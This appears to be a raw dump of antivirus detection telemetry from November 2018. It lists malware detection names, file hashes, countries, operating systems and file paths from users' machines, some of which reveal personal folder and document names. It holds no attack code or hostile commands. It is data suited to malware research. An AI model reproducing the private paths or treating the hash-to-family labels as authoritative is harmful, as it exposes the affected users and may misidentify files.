  Row(detection=Row(filename='avscan-20181102-055813-4156d78d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055813-4156D78D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051250-ea7d559f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051250-EA7D559F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054436-5a1dc8d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054436-5A1DC8D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:20:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060209-cde09369', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060209-CDE09369', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052520-a8ef04a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052520-A8EF04A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050632-08c26ce2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050632-08C26CE2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061559-bc9c0226', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061559-BC9C0226', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053812-752c1a6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053812-752C1A6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060012-87eff40a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060012-87EFF40A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061540-b18174e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061540-B18174E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055958-7fe1e986', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055958-7FE1E986', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060904-c543d2dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060904-C543D2DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050803-3f03a863', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050803-3F03A863', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-151958-13d2c4a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151446-E857F837\\AVSCAN-20181101-151958-13D2C4A5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155430-b2a4bf92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155430-B2A4BF92', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155143-9670f23f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155143-9670F23F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115910-bd464506', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b33d02c7\\AVSCAN-20181101-112906-89C620F7\\AVSCAN-20181101-115910-BD464506', filesize=380000, name='PUA/MyWebSearch.Gen.#M1.#R1'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbj ok.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\AUDIT RPG\\AUDIT AEON\\prosedur GBJ ok\\GBJ ok.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:26:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160250-06ceb27a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160250-06CEB27A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:07:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='analisa bpjs.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\ANALISA BPJS\\ANALISA BPJS.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='166332716931094.exe', filepath='\\\\?\\C:\\Temp\\166332716931094.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe319_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe319 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155546-3f394f27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155546-3F394F27', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='210105.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\210105\\210105.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-26T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T02:57:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095133-d6fda507', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_896930d9\\AVSCAN-20181101-090957-DBAFAD60\\AVSCAN-20181101-095133-D6FDA507', filesize=508000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='48f06f52cb890c81fb601ed998ff4648ad6b3a57ac60f236c4a7aaa326be4090', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:51:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143319-7e32b545', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143319-7E32B545', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:51:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-26-19.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T05:17:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tarzan.exe', filepath='E:\\طرازان\\TARZAN.EXE', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='4b955289aebc0e2afccd5dbb6a8377dd2743d18fd9da35e27fa3cbabf73076f0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:20:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='18b6f12272fdfa5d01185479af3d8c3886dd6b477a2d5339399eeceecd6da1c9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\18B6F12272FDFA5D01185479AF3D8C3886DD6B477A2D5339399EECEECD6DA1C9', filesize=1728000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='18b6f12272fdfa5d01185479af3d8c3886dd6b477a2d5339399eeceecd6da1c9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:38:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190553-f8d70b36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190553-F8D70B36', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ecb07915f524c9681ef587b5dbb23f7adb1d03f46004de033d1f847c1599eee8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\ECB07915F524C9681EF587B5DBB23F7ADB1D03F46004DE033D1F847C1599EEE8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ecb07915f524c9681ef587b5dbb23f7adb1d03f46004de033d1f847c1599eee8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:35:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\804\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='abf5101cde7d9a1c21fe01498a6e987af6a9078c46767e354e99ef3ce98ff7fd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:04:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cscript.exe', filepath='C:\\PROGRAM FILES\\OFFICE 2010 激活文件\\MINI-KMS 1.3 - 副本\\cscript.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='e017ee012e152edbb8db49659c80ace711063322250e732996224c98bdd12016', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:49sueK368k+zChEF.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7b0b0554abdba03487f36dc394f9976084d1202c1be0d7a1818c020a414106ec', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\7B0B0554ABDBA03487F36DC394F9976084D1202C1BE0D7A1818C020A414106EC', filesize=1920000, name='HEUR/AGEN.1032183.#M1.#R1'), hash='7b0b0554abdba03487f36dc394f9976084d1202c1be0d7a1818c020a414106ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='550ba13a1caba754a42bc04ccad5aeccb584a2ccf3bbef8ac2b5e5da367bb998', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\550BA13A1CABA754A42BC04CCAD5AECCB584A2CCF3BBEF8AC2B5E5DA367BB998', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='550ba13a1caba754a42bc04ccad5aeccb584a2ccf3bbef8ac2b5e5da367bb998', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235715-91e78cb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9daa457\\AVSCAN-20181101-235652-8EA07104\\AVSCAN-20181101-235715-91E78CB2', filesize=832000, name='BDS/Bladabindi.832000.1.#M1.#R1'), hash='96344dbc8ec4db313207634d43a057e17a3a15700ce61540ca461499c3e7b006', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:57:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\towerpokermpp\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\towerpokermpp\\mppoker.exe', parentsize=1289976, timestamp='2018-11-01T17:13:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233615-f6ba461e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2781180c\\AVSCAN-20181031-233236-D97E4C1A\\AVSCAN-20181031-233615-F6BA461E', filesize=752000, name='APPL/InstallBrain.AH.#M1.#R1'), hash='8502cc35c3059806fdd86988167a5d752984b1e93a8b5df5f6126591cae0ec61', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\NTServices\\mSiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='672a928e442750d5eab66020ab3d94bb084984394ced6d55c4e382464b9066af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\672A928E442750D5EAB66020AB3D94BB084984394CED6D55C4E382464B9066AF', filesize=128000, name='WORM/Autorun.gjm.#M1.#R1'), hash='672a928e442750d5eab66020ab3d94bb084984394ced6d55c4e382464b9066af', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:05:15Z'), dt=datetime.date(2018, 11, 1)),
